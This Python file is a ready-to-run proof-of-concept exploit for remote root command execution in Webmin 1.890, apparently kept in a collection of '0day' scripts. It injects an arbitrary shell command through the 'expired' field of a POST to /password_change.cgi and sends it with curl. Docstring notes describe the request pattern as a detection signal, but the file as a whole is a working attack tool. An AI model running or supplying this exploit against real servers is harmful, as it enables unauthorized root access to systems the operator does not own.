0day/CMS/Webmin/exploit.py
2022-08-12 14:50:43 +08:00


#!/usr/bin/env python3
import os
import sys
# Banner printed at start-up; it names the Webmin release this PoC was written against.
STAIN = "\nWebMin 1.890-expired-remote-root\n"

# Command-line help, shown when the arguments cannot be parsed.
usage = (
    "Usage: python3 exploit.py target COMMAND\n"
    "Ex: python3 exploit.py http://10.0.0.1:10000 id\n"
)
def exploit(target, url, command):
    """Send the proof-of-concept POST request to ``url`` through the curl binary.

    Args:
        target: Base URL of the Webmin instance; only used to build the
            ``Referer`` header (``<target>/session_login.cgi``).
        url: Full URL that receives the POST body.
        command: Text appended after the ``|`` in the ``expired`` form field.

    Returns:
        None. The exit status of ``os.system`` is discarded and curl's output
        goes straight to the terminal.

    Review notes:
        * The request shape is the useful detection signal: a POST whose
          ``expired`` field contains a ``|``, with ``user`` and ``pam`` fields
          alongside it and a ``session_login.cgi`` Referer. The caller in this
          file points ``url`` at ``/password_change.cgi``.
        * ``curl -k`` disables TLS certificate verification.
        * The command line is assembled by string formatting and handed to the
          local shell, so a single quote in any argument changes how the local
          shell parses it. Treat the script's own arguments as trusted-only.
    """
    referer_header = 'Referer: {}/session_login.cgi'.format(target)
    post_body = 'user=gotroot&pam=&expired=2|echo "";{}'.format(command)
    curl_line = "curl -k {} -d '{}' -H '{}'".format(url, post_body, referer_header)
    os.system(curl_line)
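if __name__ == '__main__':
    # The banner is always shown first, as before.
    print(STAIN)

    # Validate the argument count explicitly. The original wrapped everything
    # in a bare ``except:``, which also swallowed KeyboardInterrupt/SystemExit
    # and reported any unrelated failure as a usage error.
    if len(sys.argv) < 3:
        print(usage)
        sys.exit(1)

    # Strip trailing slashes so the joined paths do not contain "//".
    target = sys.argv[1].rstrip("/")
    # Endpoint that receives the POST built in exploit().
    url = target + "/password_change.cgi"
    command = sys.argv[2]
    exploit(target, url, command)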